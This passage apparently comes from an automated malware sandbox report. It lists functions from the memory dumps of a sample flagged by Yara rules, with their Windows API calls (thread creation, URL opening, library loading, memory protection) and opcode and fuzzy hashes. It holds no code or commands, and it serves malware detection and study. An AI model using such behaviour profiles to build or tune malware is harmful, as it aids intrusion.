                            • Opcode ID: 638c320776e752a017b69a762a67c915f7c2ffbab967800251d93e9ff9d92aa9
                            • Instruction ID: 76323e130f628eb411ef5821f23aff9dadf15a6e621e05df2504f01df97f00d3
                            • Opcode Fuzzy Hash: 638c320776e752a017b69a762a67c915f7c2ffbab967800251d93e9ff9d92aa9
                            • Instruction Fuzzy Hash: 3C31933093570ACFDF1B9E28C4997A87BA1AF41318F594359E9129B1E7D37188C8CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DB67CF9
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: CallProcWindow
                            • String ID:
                            • API String ID: 2714655100-0
                            • Opcode ID: d978281ba46e395a7338bfce3793562c8933a6e0fea3de063f59fcc1f77accb8
                            • Instruction ID: 73842123b258e2d775fbae118da21a3fbbd75a6c6eb7fa585025a99c461c7f48
                            • Opcode Fuzzy Hash: d978281ba46e395a7338bfce3793562c8933a6e0fea3de063f59fcc1f77accb8
                            • Instruction Fuzzy Hash: 8D414CB5A003499FDB04CF59C484BAABBF5FF88314F24C859E419A7721E735A845CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: fa6493815a187f3a7bbf180d4cbb7fb5888242d1549b73502ada21991963dde2
                            • Instruction ID: 3015a7f3905e218fa88b419fa875510d05a4efb9c65367cf66b2b7b3e4d18846
                            • Opcode Fuzzy Hash: fa6493815a187f3a7bbf180d4cbb7fb5888242d1549b73502ada21991963dde2
                            • Instruction Fuzzy Hash: E731953093570ACFDF1B9A28C4897A87BA1AF41324F595399E9265B1E7D37188C8CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • TerminateThread.KERNEL32(000000FE,00000000), ref: 01201A97
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: TerminateThread
                            • String ID:
                            • API String ID: 1852365436-0
                            • Opcode ID: ea528b5cbf99af1bb537c4804e56a392b76247bbb8699793626ebc1a1576e77a
                            • Instruction ID: 8b97b5efd920475bce0a8f074bd8b93a006894cc09bdac0e56f60dd3cc4bcef2
                            • Opcode Fuzzy Hash: ea528b5cbf99af1bb537c4804e56a392b76247bbb8699793626ebc1a1576e77a
                            • Instruction Fuzzy Hash: 0921F6B095030ADBDB1A9F288CC9F9477A09F46364F1A4396DD325F0EAE731C44AC796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 86ec49807df83e5135541b6ae7e1d41cb063ae4407647379d6a085838e3d2e1a
                            • Instruction ID: c1e3cdb55ef5aae7b67266543ff7cebb997473df1699754214ebe85a1de5bf22
                            • Opcode Fuzzy Hash: 86ec49807df83e5135541b6ae7e1d41cb063ae4407647379d6a085838e3d2e1a
                            • Instruction Fuzzy Hash: 9631853097470ACFDF1B9A24C4897A87BA2AF41314F595359E9165B0E7D37188C8CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bdf9d6a2e4412ce1513210c306d411a9200d600065341edbba79ae3e51a360a
                            • Instruction ID: 173e26ea4907e9a2871ccf4fb2fd035b9f73bc60d2f65b34def7fda9f7c704d0
                            • Opcode Fuzzy Hash: 2bdf9d6a2e4412ce1513210c306d411a9200d600065341edbba79ae3e51a360a
                            • Instruction Fuzzy Hash: D52101A1634282EEDB2BBB24D952B7B2369EF61710F55C75DEB83961C3D7A0CC408612
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • TerminateThread.KERNEL32(000000FE,00000000), ref: 01201A97
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: TerminateThread
                            • String ID:
                            • API String ID: 1852365436-0
                            • Opcode ID: 30a2f54a560ac6bac1b75523d4194c4c73df2738d25c0ecf2939b64c054a984a
                            • Instruction ID: a00e5869a8ca06d6bfc701d75326bffac954a19fa61e1ec84f695a9d8a8a4238
                            • Opcode Fuzzy Hash: 30a2f54a560ac6bac1b75523d4194c4c73df2738d25c0ecf2939b64c054a984a
                            • Instruction Fuzzy Hash: 4721F6B095030ADBDB199F2888C9F9477A09F45364F194395DD325F0EAE731C44AC796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01202E11
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID:
                            • API String ID: 2038078732-0
                            • Opcode ID: ca2ae32a935c36d0e500114fbcc96545abafd8b8440ed9f195b4b9c7fd608f25
                            • Instruction ID: 8cc2724f47cc97830008a5cec365f4c8e12a01c9496192900d1177a4c68effdc
                            • Opcode Fuzzy Hash: ca2ae32a935c36d0e500114fbcc96545abafd8b8440ed9f195b4b9c7fd608f25
                            • Instruction Fuzzy Hash: 0821CF3069034FDBEF358E14CD89FEA37A5AF04380F448129EE0DAB189D7719945DB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB66DFF
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 690b35d70afaed7b4420eb271e6ce18b1e577dd6c3179c9c7bcb67aa5982f9d8
                            • Instruction ID: 98cbf95549dbfe6fc227387d1c2712b0d9971d6ddb27dc24cfa79b2199a5ec11
                            • Opcode Fuzzy Hash: 690b35d70afaed7b4420eb271e6ce18b1e577dd6c3179c9c7bcb67aa5982f9d8
                            • Instruction Fuzzy Hash: 8D21F4B5D002089FDB00CFAAD484ADEBBF5FB48324F10801AE819A3310D375A954CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DB66DFF
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: c7e6f3589f33eb91990d0826d3091ecdfe20746d12cdd49c8a12f23987b9c1b2
                            • Instruction ID: 65f1783d5e0722af0fcc8ec2752ec4c18a0ae11ad67bdd4ae0a6d947a467bccb
                            • Opcode Fuzzy Hash: c7e6f3589f33eb91990d0826d3091ecdfe20746d12cdd49c8a12f23987b9c1b2
                            • Instruction Fuzzy Hash: F621F5B5D002489FDB00CFAAD484ADEFBF9FB48314F10801AE815A3310D379A954CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEncodePointer.NTDLL(00000000), ref: 1DB6BE72
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: EncodePointer
                            • String ID:
                            • API String ID: 2118026453-0
                            • Opcode ID: c8204e0bb4411a20a36b1b87e5f418fc79c93fac29b7d6149e77c2348ee71707
                            • Instruction ID: f0abddbd4be7af51cf85e0225792b41349aae9f8305b9914d47522d460afa666
                            • Opcode Fuzzy Hash: c8204e0bb4411a20a36b1b87e5f418fc79c93fac29b7d6149e77c2348ee71707
                            • Instruction Fuzzy Hash: BF21AC719043998FDB50CFA9C44479EBFF8FB4A314F14846AD409E3251D379A508CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEncodePointer.NTDLL(00000000), ref: 1DB6BE72
                            Memory Dump Source
                            • Source File: 00000008.00000002.911882159.000000001DB60000.00000040.00000001.sdmp, Offset: 1DB60000, based on PE: false
                            Similarity
                            • API ID: EncodePointer
                            • String ID:
                            • API String ID: 2118026453-0
                            • Opcode ID: 5e86515ea5bd6199ca4143344a9c03db46ad84a128c102fe406cfc7cc9702204
                            • Instruction ID: 76680dace9e92a93df7bd3d891412a24e5a5b1b62df103e3201ccb8c477cd0e3
                            • Opcode Fuzzy Hash: 5e86515ea5bd6199ca4143344a9c03db46ad84a128c102fe406cfc7cc9702204
                            • Instruction Fuzzy Hash: D11179719003598FDB50DFA9C4447AEBBF8FB49314F50842AD40AA3744D77AA544CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: bc558a01638cf375f18a3d5d5acc1d529e9ab9b39bd4070f2fd3306800522c41
                            • Instruction ID: 029858537303861adfb13f8ccc87a67a8b9b74237372e8904428f183318e8ab2
                            • Opcode Fuzzy Hash: bc558a01638cf375f18a3d5d5acc1d529e9ab9b39bd4070f2fd3306800522c41
                            • Instruction Fuzzy Hash: B701D130D6131FC7DF0EAE39808A6D0BBA29A8124479D0398DD229B46DE322085DCF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 8d13da37b567032cc51e5c63c1153f87afef78c8eb7da66be9538cfaa8f3e65b
                            • Instruction ID: 7d0bbb24c0e9b40ac2dd437384d2a5eb7c0883b54c7a1bd41fad3da7e734a882
                            • Opcode Fuzzy Hash: 8d13da37b567032cc51e5c63c1153f87afef78c8eb7da66be9538cfaa8f3e65b
                            • Instruction Fuzzy Hash: 02F0AF30D6031F87DF0EAE39848D6D4BB929A8225479E0388D9329B45DD722485DCBC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 5b7ff7f4d703b8fa9ae205fc662368e5ae1a1e075aed868f9a0e57b910a9f2f9
                            • Instruction ID: 4d24af908aef905b706a9f6c99c8de27374345bc1f3d1fb4daa5480977f92ea2
                            • Opcode Fuzzy Hash: 5b7ff7f4d703b8fa9ae205fc662368e5ae1a1e075aed868f9a0e57b910a9f2f9
                            • Instruction Fuzzy Hash: C6F0FC60D703DE96DF067F35A8817797350CB50618F56C3A9EF629708BC760845987C6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 1f1a3989235be38bc8266e9fb0c44f804a552fe47c86fd7cdfdf4799441cc1b9
                            • Instruction ID: 05f66b04f38b05eb10ff682510c09532a9de14f6612ed447bce58f7748a2d3b2
                            • Opcode Fuzzy Hash: 1f1a3989235be38bc8266e9fb0c44f804a552fe47c86fd7cdfdf4799441cc1b9
                            • Instruction Fuzzy Hash: E2F04661C643DE9BCF0A7F7598C1BACBB10CF51618F1AC399DBA09B08BC321841983C2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: b448c39c2f3e7bd6be2bb394f3a48c2b01620ca0b5b66e32cdefd8dbf7d2a9c3
                            • Instruction ID: ddf07c66fe95337ddfeaa6eb002b51c63947ab8ae2a9322d8f4fd1de1e6b1c8e
                            • Opcode Fuzzy Hash: b448c39c2f3e7bd6be2bb394f3a48c2b01620ca0b5b66e32cdefd8dbf7d2a9c3
                            • Instruction Fuzzy Hash: 7BF0B470C603DD97CF09BF2598C5BA8B750DB50714F6AC3A8DB219B449C731485D87C6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: ba48b15892a40cde784d2066822c0663a852ebc28888056488c41793a16f1c61
                            • Instruction ID: 8e4bd47e09e62d9a73d8778a7ba378a866486325a7d214b37c400d4d345c15fd
                            • Opcode Fuzzy Hash: ba48b15892a40cde784d2066822c0663a852ebc28888056488c41793a16f1c61
                            • Instruction Fuzzy Hash: F6F0E5905341DAA8EF133760BD51B7E2214CFA0A19F62D369BF52910C3C6A088444152
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 2e978e1381999b02a8183e72efc129e7a80302bfe3a21c27226bae4275c148a7
                            • Instruction ID: 34a958c3b57122cfb065297b5f086ec9dabd5fa9b1a6d25684330224f0540b1d
                            • Opcode Fuzzy Hash: 2e978e1381999b02a8183e72efc129e7a80302bfe3a21c27226bae4275c148a7
                            • Instruction Fuzzy Hash: 0BE0ECB0D413AD87CF0CBF769889A99B790DA50654B2AC298E8254F91CDB31492ECBC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,012029D0,01202A7F), ref: 01202A4B
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: c5e85075b49ec9473569139524430bab7aab67a47c47bd3f9d3adf217b49d15e
                            • Instruction ID: ea57a6563977a031bbd0397d9a6b88210f966f57a6744cbc6e466db1dc0d991e
                            • Opcode Fuzzy Hash: c5e85075b49ec9473569139524430bab7aab67a47c47bd3f9d3adf217b49d15e
                            • Instruction Fuzzy Hash: BCD08C343D8300F6FA304A30AC6BFC622076B90F00EE0400DBB0A3E1C042F35EA0C51A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,321C9581,?,01205069,01201DCE,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0120443F
                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 752467af53da7a1d89406b7029cd08aad9a81662ca285cfa27fc61e4228a4920
                            • Instruction ID: cf8a904e9e8485e8fd49bad82740ccd1bcaa060273fe8e7506fcf03cb89f5cd7
                            • Opcode Fuzzy Hash: 752467af53da7a1d89406b7029cd08aad9a81662ca285cfa27fc61e4228a4920
                            • Instruction Fuzzy Hash: 74C080B11303DB965B063FF079115BD3A11CFA0915713C31DBB1149581CB30C9404BC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911764713.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07f6cabc5b108c4dc2fd9cade03b3f662f25d2333360bbbd099c5a9be68eb867
                            • Instruction ID: 7761c519a1ac0891fb3467d5b82f431a6e2b13a547bccba1e35ba3ba057a8276
                            • Opcode Fuzzy Hash: 07f6cabc5b108c4dc2fd9cade03b3f662f25d2333360bbbd099c5a9be68eb867
                            • Instruction Fuzzy Hash: AF213375504284DFCF01CF08C8C0B66BFA9FB98328F20C668E80A4B646C376D456CAE3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911764713.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c435b8c976931bf46db4a43f0e46563ac282c60f031e6831f3c79c7be6eee17
                            • Instruction ID: a846c325886e72beae5de0ae8bb297602826cb3158711deeb3c93ba579bd0961
                            • Opcode Fuzzy Hash: 3c435b8c976931bf46db4a43f0e46563ac282c60f031e6831f3c79c7be6eee17
                            • Instruction Fuzzy Hash: 6F21F475504284DFDF05DF18D9C0B27BB69FB98314F20C569E80A0B646C336E85AC6E3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911788163.000000001DACD000.00000040.00000001.sdmp, Offset: 1DACD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6a0b1e5638c8fc18ff67699fc3382ebe845da9779a6c1ca05c3b97ff05f4c61
                            • Instruction ID: 4ca54319b5b8e73691bd6d59f63217f1177af1f59eef0cd6e2d117664174604d
                            • Opcode Fuzzy Hash: b6a0b1e5638c8fc18ff67699fc3382ebe845da9779a6c1ca05c3b97ff05f4c61
                            • Instruction Fuzzy Hash: 7A21B375504344DFDB05CF18D9C4B16BBA5FB84624F20C569E84A4B746C736D846CAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911788163.000000001DACD000.00000040.00000001.sdmp, Offset: 1DACD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb586730d6c910d5c8e3addc05491004a57aad7734cda9a81c2f73767a6df027
                            • Instruction ID: 8445646c7f510f6b7eb7d21842ee1887dce1ba5892ddd7bbbfaaa93b7a6fde5d
                            • Opcode Fuzzy Hash: bb586730d6c910d5c8e3addc05491004a57aad7734cda9a81c2f73767a6df027
                            • Instruction Fuzzy Hash: 1C2162755083C09FCB02CF18D594B15BF71FB46224F24C5EAD84A8B296C33AD856CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911764713.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d78d467607f0668000de24e778896c59aec1b711397eda07e2b97edf03009929
                            • Instruction ID: 0bb1f3994fb924c117432941967980a709c45bbe0950de45b028da40e643a665
                            • Opcode Fuzzy Hash: d78d467607f0668000de24e778896c59aec1b711397eda07e2b97edf03009929
                            • Instruction Fuzzy Hash: 7711817A504280DFDF02CF14D5C4B16BF71FB84324F24C6A9D80A4B656C376D45ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.911764713.000000001DABD000.00000040.00000001.sdmp, Offset: 1DABD000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d78d467607f0668000de24e778896c59aec1b711397eda07e2b97edf03009929
                            • Instruction ID: d2fc833d7d8676afdab89646f59e99d1f9ff4c4479110f1642d384caa4fdf8ae
                            • Opcode Fuzzy Hash: d78d467607f0668000de24e778896c59aec1b711397eda07e2b97edf03009929
                            • Instruction Fuzzy Hash: 54118E76504284DFCF06CF14D9C4B56BF72FB84324F24C6A9D84A4B656C33AD46ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadMemoryProtectVirtual
                            • String ID:
                            • API String ID: 3389902171-0
                            • Opcode ID: e7a7fe1657e8fde0a7698c827b56197602e856107f70588c073b59469c47257d
                            • Instruction ID: ead134423805576e46155be40d2ef0bbcced5db9942092a5b08e1b52883dfab9
                            • Opcode Fuzzy Hash: e7a7fe1657e8fde0a7698c827b56197602e856107f70588c073b59469c47257d
                            • Instruction Fuzzy Hash: 9B718674A243428FDB27CF2C84D4769BB91EF52224F45D399DA968F2D7C3748442CB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d975935a14ec0fd7f4eb1989424bccbad211db2ced40d2b804e8befa8e3d1fba
                            • Instruction ID: 9acbe261c1a47061c5eb6e09067553a7fcaa752adbe2e64715af5a8d8f173d28
                            • Opcode Fuzzy Hash: d975935a14ec0fd7f4eb1989424bccbad211db2ced40d2b804e8befa8e3d1fba
                            • Instruction Fuzzy Hash: D0E0226192C2444EEB3BDA68C8D37663BD8EB2B108F844185D74247382E4E4E140836A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22668ffe9a040e4a539b752a4935d9063e579b1a5bfd65191cd0f60bfa6dddf6
                            • Instruction ID: a67382163c920013606b57dad4b9d7a662921fb7d941664a8e28df344105b5ca
                            • Opcode Fuzzy Hash: 22668ffe9a040e4a539b752a4935d9063e579b1a5bfd65191cd0f60bfa6dddf6
                            • Instruction Fuzzy Hash: 0DE0ED75335182CFD716EA58C6E4E5673B5EB54710F41C662EB05C76A3C230ED80C665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7004beeabbfb3f2473cb4eeff6506543aca8df6745b410c541222a0c2ea0060
                            • Instruction ID: dd31aede231c76fdb623299d48ff870e71e82ccd359e4e8641ae1d4f3a672094
                            • Opcode Fuzzy Hash: a7004beeabbfb3f2473cb4eeff6506543aca8df6745b410c541222a0c2ea0060
                            • Instruction Fuzzy Hash: 25C04C30339580CFCF9AEA45C151B51B374A750640F418691E2024B5D2C295DD01CA41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000008.00000002.908051944.0000000001201000.00000040.00000001.sdmp, Offset: 01201000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44213157ba81852c4626c83c7ddfcf0ae0347adae21ddd619a56f3867bdc9689
                            • Instruction ID: ed521738dc57e4363d940ed3e952e764fa903964764ca1986dab7f6a97f187be
                            • Opcode Fuzzy Hash: 44213157ba81852c4626c83c7ddfcf0ae0347adae21ddd619a56f3867bdc9689
                            • Instruction Fuzzy Hash: 6DB092B62015818FFF02DB08D482B4073B0FB28788B0804D0E402CBB12C224E900CA00
                            Uniqueness

                            Uniqueness Score: -1.00%